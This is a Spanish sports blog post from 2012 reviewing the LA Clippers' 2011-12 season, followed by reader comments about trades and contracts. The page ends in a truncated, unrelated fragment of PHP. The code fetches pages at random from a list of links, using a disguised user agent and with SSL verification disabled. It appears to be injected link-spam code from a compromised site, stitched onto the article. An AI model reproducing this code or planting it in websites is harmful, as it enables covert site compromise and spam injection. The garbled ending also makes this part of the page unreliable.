Los Angeles Clippers: Notable

06 de July de 2012 por Esteban

Sabrán disculpar la extensión de este análisis, pero creo que las locuras ocurridas en poco más de cinco meses merecen un análisis pormenorizado.

El final de la temporada pasada hacia presagiar un futuro muy brillante en el famoso vecino pobre. Tras los fracasos de Manning y Olowakondi, los Clippers dieron al fin con un hombre franquicia, quizá más espectacular y vendedor que jugador, pero que al menos, podía convertirse en la cara visible del equipo fuera a la ciudad que fuera. Eso no es poco.

La temporada clipper puede dividirse en tres partes:

La primera parte  podemos llamarla, “en busca de PO” o “equipo compensado”. Los Clippers acabaron la temporada 2010-2011 en buena forma, con la sensación de que sin lesiones, este temporada podía ser la buena. Daba la impresión de que renovando a algunos de sus jugadores y reforzando el puesto de alero podían competir en el salvaje Oeste. Se pusieron manos a la obra igualando la oferta de 10 millones al año que recibió Deandre Jordan, pero se suponía que valdría la pena. Para su hueco en el puesto de alero sobrepagaron a Caron Butler, pero tenían espacio y el ala era su único puesto a reforzar, así que se hizo. Como frutilla del postre, y debido en parte a la lesión de Bledsoe, rescataron por monedas a un amnistiado y sumamente útil Chauncey Billups. Estos movimientos convirtieron un equipo de lotería en un aspirante al 7º u 8º puesto en el oeste, gracias una amplia rotación, sumamente larga y compensada: Billups-Gordon-Butler-Griffin-Jordan, con un banco formando por Mo-Foye-Aminu-Kaman, a la espera del regreso de Bledsoe y con media excepción por usar. No serían más que unos Nuggets pero al menos tenían potencial suficiente para pelear por unos PO este año, mientras sus jóvenes seguían progresando.

La segunda parte, podemos llamarla “en busca del título” o “equipo descompensado”. Los Clippers tenían un núcleo joven y la selección de Minnesota asegurada a final de temporada pero deberían esperar algunos años para ser realmente competitivos. De la mano de Griffin y Gordon y el apoyo de los jóvenes Bledsoe, Aminu y Jordan podrían llegar a ser contendientes. Entonces aparecieron las famosas “basketball reasons” y CP3 estuvo disponible. La tentación fue tan grande que dieron medio equipo por él: Gordon, Aminu, Kaman y la ronda de Minnesota por el grandioso base. Justamente la de base era la posición donde menos necesitaban reforzarse y el único puesto donde no entregaron jugadores a cambio de Chris Paul. Su rotación quedó automáticamente hecha un desastre y sumamente descompensada.  Tenían cuatro bases, Paul, Mo, Billups y Bledsoe.  Atención, un solo escolta, Randy Foye. En el puesto de alero quedaron Caron Butler y Ryan Gomes ,y como internos Griffin, Jordan y el gran Brian Cook. Al menos solucionaron este último agujero rápidamente con la llegada de Evans por el mínimo).

Lo cierto es que aquí se noto la mano de uno de los entrenadores mas infravalorados de toda la NBA. Vinny Del Negro mostró toda su muñeca y administrando pobrezas hizo un trabajo excelente. Primero ubicó a Billups en la posición de escolta titular, cosa que le dio unos frutos notables. Reinventó a Mo Williams y lo convertió en una especie de Crawford o Terry, saltando del banco para anotar y anotar, jugando alternativamente de base y de escolta. Finalmente, formó una pequeña rotación interior con Griffin, Jordan y Evans. Los Clippers jugaron  los primeros 20 partidos del año con Chris Paul, Caron Butler, estos cinco jugadores y algunos minutos testimoniales de Foye, Gomes y Cook.

Lo cierto es que pese a lo descompensado de la plantilla, los Clippers se convirtieron en la sensación en la liga. El Lob City se hizo más que popular, los partidos eran un show de alley-oops, jugadas sensacionales y victorias. Durante beuna parte de esos primeros 2 meses marcharon en segunda o tercera posición de la conferencia. Consiguieron victorias ante Lakers, Thunder, Mavs (triple sobre la chicharra, cortesía de Billups), Heat, Wizards (de 40 puntos)… Tenían 2 titulares en el All Star, Paul y Griffin, a Billups mostrando todo su saber estar, a Jordan conseguiendo hasta 8 tapas en un partido, a Mo con 15 ppp saliendo del banco, y especificamente a CP3 metido de lleno en la carrera por el MVP. Eran 45 minutos de volcadas y lujos y los últimos 3 para que Paul o Billups definieran los juegos.

Dejaban atrás todos los prejuicios aunque daba la sensación de que para aspirar al título les faltaba profundidad en el juego interior y otro jugador perimetral con capacidad de anotar saliendo del banco. En ese punto llegó otro campanazo: Kenyon Martin anunciaba su llegada a los Clippers solucionando así el problema interior. Además había fuertes rumores de que J.R. Smith seguiría sus pasos. No era gran cosa, peropodía ser el anotador adicional que necesitaban desde el banco. En la cresta de la ola, los Clippers para destinados a ser el rival a batir por los Thunder.

La tercera parte de la temporada podemos denominarla “el fin de la ilusión” o “reinventándose”. Cuando parecía que los planetas al fin se habían alineado a favor de los Clippers, la “maldición” que estos acarrean volvió a escena. El 6 de Febrero Chauncey Billups debía abandonar la cancha en andas y en las horas siguientes se confirmaba lo peor: no podría volver a jugar por el plazo de ocho meses. La lesión de Billups, sumada a la clara descompensación en los puestos perimetrales y el fichaje de JR Smith por los NYK dejaba a los Clippers en muy mala situación. No solo por el nivel enorme que venía mostrando Billups y su invalorable saber estar en los minutos finales de los juegos, sinó por que los Clippers no tenían otro escolta de nivel ni remotamente similar al del ex de los Knicks.

En el primer juego sin Billups Del Negro salió de inicio con Mo Williams pero con él de entrada el banco de suplentes era realmente lamentable. Así que se decidió por darle la confianza a Randy Foye desde el inicio, casi como un espectador, para poder mantener a Mo saltando desde el banco. La jugada le dio resultados positivos, y si bien no eran los de antes, al menos se mantuvieron por encima del 50%.

Antes del fin de la fase de traspasos se hicieron con Nick Young, un anotador nato pero que de ninguna manera podía remplazar la calidad de Billups. A pesar de la llegada de Young Del negro mantuvo a Foye entre los titulares y este respondió de forma sorprendente, con unos últimos dos meses de competención muy buenos con promedios por encima de los 15ppp y con un acierto de triples deslumbrante. Por eso me llamó la atención, cuando hilvanaron varias derrotas consecutivas, que todos los medios comenzaran a pedir la cabeza de Vinny, infravalorando lo que tuvo que trabajar para mantener al equipo donde estaba. La respuesta de los Clippers fueron 8 victorias en los siguientes 9 partidos, asegurándose de este modo entrar a los PO. Desgraciadamente, perdieron la condición de local sobre los Grizzlies en los últimos partidos.

Prácticamente todo el blog apostaba por la victoria de Memphis e incluso algunos hasta aventuraron una barrida. Pero lo cierto es que los Clippers se habían reinventado de forma efectiva. El regreso de la lesión de Bledsoe fue brillante y tanto Mo como Young se trasformaron en especialistas para salir del banco, convirtiéndose en una constante amenaza de 30 puntos por noche. La serie a 7 juegos, sin ventaja de campo, fue un éxtasis. Chris Paul jugó una serie al nivel de Durant y Lebron, definiendo juego tras juego, y la dupla Evans-Martin mostró toda su fuerza y trabajo sucio para ganar la serie. La segunda ronda ya fue demasiado premio y fueron barridos fácilmente por unos descansados y altamente superiores Spurs.

De todas maneras, haber llegada a estar entre los cuatro mejores del durísimo oeste no es moco de pavo, y menos aún cuando la franquicia tiene una situación salarial relativamente cómoda y un equipo medianamente joven para competir varios años más (ojala pudieran sen decir lo mismo equipos como Lakers, Mavs y Spurs).

Lo mejor: la llegada de Cris Paul, sin dudas el mejor base de la NBA. Se cargó el equipo al hombro sin inconvenientes y llevó a un equipo de lotería a segunda ronda de PO. Con su llegada, los Clippers abandonaron su modo de reconstrucción eterna y ahora nadie puede descartarlos para la lucha por el título. Eric Bledsoe demostró todo su potencial, por algo ya confiaron en él como el base de recambio de Paul, traspasando a Mo Williams. Enérgico como pocos y frio de cabeza, mostro un nivel superlativo en PO. Vinny Del Negro lo hizo más que bien y demostró que puede comandar un equipo ganador. El cambio de imagen: Si bien perdieron mucho futuro con el trade que trajo a Paul, les aportó una imagen de equipo fuerte y ganador y en una sola temporada se quitaron de encima el título de equipo maldito de la liga.

Lo peor: Blake Griffin estuvo lejísimo de ser quien se esperaba que fuera. Con CP3 al lado me lo imaginaba un tío que llegara a los 25 puntos de promedio y se mantuviera en los 12 rebotes de su año rookie. Pues no pasó, bajó sus números en todos los aspectos. De todas maneras jugo unos buenos PO, mostrando que puede aportar en todos los casilleros. De hecho, jugó sus dos mejores partidos del año en PO, uno en cada serie.El contrato de DeAndre Jordan. Sus limitaciones eran harto conocidas y las aceptaron al firmar su contratazo, pero se vieron más que acentuadas en PO donde realmente lució mal. Lo cierto es que están atados por tres años más, a razón de 10 millones, así que a aguantarlo. Los 4 millones que le quedan por cobrar a un cada vez más inútil Ryan Gomes. Caron Butler parece que cada año envejece por tres. En su último año de contrato, a este ritmo, será un lastre.

JUGANDO AL GM

– Sobraba un base y ya fue cambiado por Odom. Yo me hubiese quedado con la trade exception de Utah en lugar de fichar a un inestable en lo emocional como Lamar Odom.

– No renovaría a Foye y quizá sí a Young si pretende menos de 5 millones.

– Aplicaria la amnistía lo antes posible a Gomes y con eso intentaría renovar a Young.

– Con Paul y Bledsoe tienen bien cubierta la base. Butler y Odom cubren el ala. Griffin, Jordan, Odom y Evans el juego interno. Queda por resolver el tema del escolta. Se habla de Crawford y Allen. Yo me la jugaría con O.J. Mayo que puede ayudar desde ahora y es todavía muy joven. Con la renovación de Youg no sé si lograrían ser candidatos al titulo pero es la mejor salida que tienen.

– Descarto a Billups quien parece estar mirando otros horizontes.

Comenta

21 comentarios a esta entrada

  1. Ru dice:
    #1

    La NBA no para y cualquier hipótesis de fichajes se cae cuando las noticias se confirman:Jamal Crawford 4 años por 25 millones,y Billups una única temporada,dicen que por 4.3 millones.

    Mal firmado DeAndre como dice el análisis,mal firmado Griffin para 5 años la friolera de 95 millones.Se le debe exigir ya a Griffin que mejore,y que no sea solo el que hace los mates más brutales de toda la competición.Ryan Gomes es un expiring así que siempre tendrá valor como tal,no creo que a estas alturas haya que amnistiarlo,y Odom lo mismo,otro expiring.Que un profesional tenga esa cabeza que tiene Odom no vale 8 millones,vamos a ver si está contento este año el chaval ¬¬ Muchas ganas de ver el papel que tendrá Bledsoe apartado Mo de la rotación.

    Se supone que se meterán fácil en PO’s,así que les auguro repetir la temporada pasada,ya veremos si en el momento de la verdad saben dar un paso más.

      Citar

  2. HeiNeKeN dice:
    #2

    La prioridad ahora debería ser renovar a Kenyon Martin y si pueden traspasar a Gomes (es expiring) por otro alero medio decente. También pueden renovar todavía a Foye (estaba en 4 millones el año pasado) y a Bobby Simmons.

    Recordemos que Odom es expiring y Chris Paul también, todavía tienen que renovarlo.

      Citar

  3. Vader dice:
    #3

    Evans creo que ha firmado por los Nets.

    Gran análisis, saludos.

      Citar

  4. Nacho dice:
    #4

    No llego al metro noventa.
    Tengo unos brazos largos, y las manos ni te cuento.
    Igual soy feíllo, pero las chicas dicen que soy uno de los más guapos de la NBA.
    Soy algo chancero, y me joden los llorones, aunque ganen.
    En PO subo notablemente mis números, por aquello de que hay que achuchar.
    El padre de TJ fue mi antecesor en aquello del triple-doble, me mola Jason.

    Ah!!!!, y me descojono cuando hablan del mejor base de la NBA.

    Por todo lo demás, buen análisis, Esteban.

      Citar

  5. Esteban dice:
    #5

    jajajajajaja gracias nacho

    mis disculpas por lo desactualizado del GM, el analisis se hizo el lunes pasado creo, no pense que habria tanto movimiento,

    evans ya esta en los nets, ni me lo imaginaba, gran sorpresa

    billuos renovo, cuando todos lo daban en el heat, otro sorpreson

    y cayo crwaford, esto se podia intuir, de hecho lo nombre entre los escoltas

    en fin, ya no hay mucho GM al que jugar, o se renuva martin o bucan otro ìvot y se baja la cortina, no tienen espacio ni lugar en la rotacion ni para foye ni para youn, si bien les faltaria otro alero, creo que por valor sera simmons, young tendra ofertas que los clippers ya no podran igualar

    coinciden con el notable?

      Citar

  6. Jose Luis dice:
    #6

    Coincido con el notable plenamente. A ver que hacen con su rotacion interior.

      Citar

  7. Sancho88 dice:
    #7

    Notable alto incluso. El equipo parecía carne de primera ronda, pero llegaron los playoffs y jugaron a su máximo nivel. Alcanzaron su límite, que no podía ser ir más allá de semifinales. Notable alto rozando el sobresaliente. Creo que se equivocan con el super contrato a Griffin…

      Citar

  8. Vader dice:
    #8

    Yo creo que lo de Griffin esta bien firmado… Te sale un jugador así y hay que retenerlo al precio que sea. Por una vez que Clippers se gastan los $ y también les criticamos…

      Citar

  9. Sancho88 dice:
    #9

    A ver, me explico. Seguramente, yo tb habría hecho ese movimiento, pero para mí el riesgo es todo el pastón que va a cobrar y las dudas que me genera su rendimiento acorde con esa pasta. Es decir, no sé si su ratio rendimiento/salario les permitirá algún día luchar por el título y si este salario no va a lastrar otras decisiones del equipo para acompañarle en esa aventura… esa era mi crítica, más como escepticismo que como movimiento a hacer, que era lógico que había que renovar a Griffin. No me expliqué bien Vader, pero esa esto lo que quería decir. Ahora bien, viendo sus cualidades todos seguimos esperando su mejora. Este año objetivamente no ha mejorado y ya empieza a tener similitudes su carrera con la de Carmelo Anthony. IQ nulo y a vivir de la calidad. Es por eso mis dudas

      Citar

  10. Vader dice:
    #10

    Ya, ya pero tan como esta montando este “circo” si te sale en el draft un jugador como Griffin y lo pierdes o lo empiezas a perder por regaterale unos dólares es un suicidio. Quizas Griffin nunca será un Garnett o Duncan pero siempre o casi siempre va a cobrar el máximo…

      Citar

  11. HeiNeKeN dice:
    #11

    Griffin de momento no merece tanta pasta, eso lo ve cualquiera, pero en una franquicia eternamente perdedora y con la etiqueta de “tacaña”, que se gasten la pasta por una vez, pues lo veo bien y es lo que les tocaba hacer. Por lo menos ya estan intentando hacer algo (desde el año pasado) y no como esos años de los Maggette, Darius Miles, Andre Miller, Odom , Quentin Richardson, Ricky Davis… (todos ellos en sus mejores tiempos además)… donde los dejaron volar a todos por no pagarles a ninguno y acabar haciendo la risa año tras año.

      Citar

  12. rumbero dice:
    #12

    Sancho88: Notable alto incluso. El equipo parecía carne de primera ronda, pero llegaron los playoffs y jugaron a su máximo nivel. Alcanzaron su límite, que no podía ser ir más allá de semifinales. Notable alto rozando el sobresaliente. Creo que se equivocan con el super contrato a Griffin…

    A mi me cuesta ponerles más que un notable tenindo en cuenta la eliminatoria que tuvieron contra los Spurs, donde demostraron no tener ninguna opción. Ese era seguramente su techo, pero esperaba algo más de resistencia sobretodo después de esa tremenda serie con Memphis donde demostraron ser un equipo muy duro. Pero vaya, que la temporada ha sido muy buena, y fácilmente este equipo tiene que ir a mejor. Buena incorporación la de Crawford y si se han traido al loquero de Odom para los Ángeles pues les puede quedar un roster la mar de completo. Eso si, atentos a Paul y su renovación. Ha sido el faro de este equipo y sería un mazazo importante perderlo

      Citar

  13. Esteban dice:
    #13

    coincido con sancho, esta temporada de griffin lo ha mostrado muy estancado, no ha progresado ni en el tiro a media distancia, ni en libres, ni en el juego al poste, todos sus puntos vienen de volcadas o algunas jugadas raras que haces tipo alero/alapivote,
    pero asi es la NBA, esta cobrando lo que todas las franquicias le ofrecerian, quiza podrian haber sacado algun precio mejor por el momento de la renovacion, ya que para firmar el maximo, era preferible ver que pasaba este año e igualar la oferta que tuviera en el verano,

    igualmente, como puse en el analisis, en PO mostro muchas virtudes, nunca domino en ataque y sus puntos siempre son esporadicos, pero por su velocidad y agilidad, recupero balones, se tiro de cabeza a los balones divididos, encabezo contrataques, bajo rebotes, y hasta mejoro en los llibres

    todo esto parece que le da algo de chapa de ganador

    en cuanto al salarios del conjunto, creo que su dueño en este año ha notado lo rentable que es tener un equipo ganador en comparacion con uno perdedor, asi que creo que ha dado via libre a pagar impuesto de lujo en los proximos años

      Citar

  14. HeiNeKeN dice:
    #14

    Por cierto, ahora recuerdo que Odom se fue de los Clippers la primera vez que estuvo (no quiso renovar) porque no le ponian de base (teniendo a Andre Miller creo recordar). ¿Querrá jugar de base en lugar de Paul? ¿Volverá al mismo psicologo que le trataba mientras estaba en los Lakers?

      Citar

  15. Esteban dice:
    #15

    HeiNeKeN:
    Por cierto, ahora recuerdo que Odom se fue de los Clippers la primera vez que estuvo (no quiso renovar) porque no le ponian de base (teniendo a Andre Miller creo recordar). ¿Querrá jugar de base en lugar de Paul? ¿Volverá al mismo psicologo que le trataba mientras estaba en los Lakers?

    si andre miller se fue de clippers y odom, tamb, asi fue

      Citar

  16. Sancho88 dice:
    #16

    ahora lo que molaría es que ficharan a Elton Brand, otro hijo pródigo, jejej. Aunque tb podría ir a los Bulls, aún más mítico allí!!

      Citar

  17. Vader dice:
    #17

    Sorpresa, Grant Hill a los Clippers. Estan haciendo un gran equipo.

      Citar

  18. Esteban dice:
    #18

    wow, q bien les ha salido lo de CP3, como atrae jugadores, si no estuviera el base, es casi imposible que hill, billups y crawford firmaran para este equipo, cuando por los años sus chances de titulo casi son nulas, sin dudas creen que pueden ganar un titulo este año

      Citar

  19. Sancho88 dice:
    #19

    Creo que falta talento ofensivo en el puesto de 5. Pau les vendría de perlas. Con él en vez de Jordan sí que podrían lograr el anillo

      Citar

  20. Esteban dice:
    #20

    sisis esta bien, tienen un problema con jordan, pero tienen el resto genial, mas no de puede pedir no?

    la temporada D de CP3, por primera vez en su carrera va a jugar con un equipo que en principio no tiene que mirar para arriba a nadie, debe demostrar de que esta hecho

      Citar

  21. rumbero dice:
    #21

    Sancho88:
    Creo que falta talento ofensivo en el puesto de 5. Pau les vendría de perlas. Con él en vez de Jordan sí que podrían lograr el anillo

    Es que debe haber conos con más fundamentos ofensivos que Jordan, eso si, 40 millones en 4 años por ser un 7 pies que mete para abajo los alley oops de CP3.Great!
    Pero como dice Esteban, center aparte les queda un equipo la mar de apañao. Creo que echaran de menos al estilista de Evans, pero el resto de incorporaciones tienen buena pinta con la duda de Odom. Si se acercara un poco al nivel ofrecido en Lakers seria la leche para los Clippers. Y con la baja de Mo Williams supongo que veremos más minutos en pista a Bledsoe que tiene madera de jugón.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>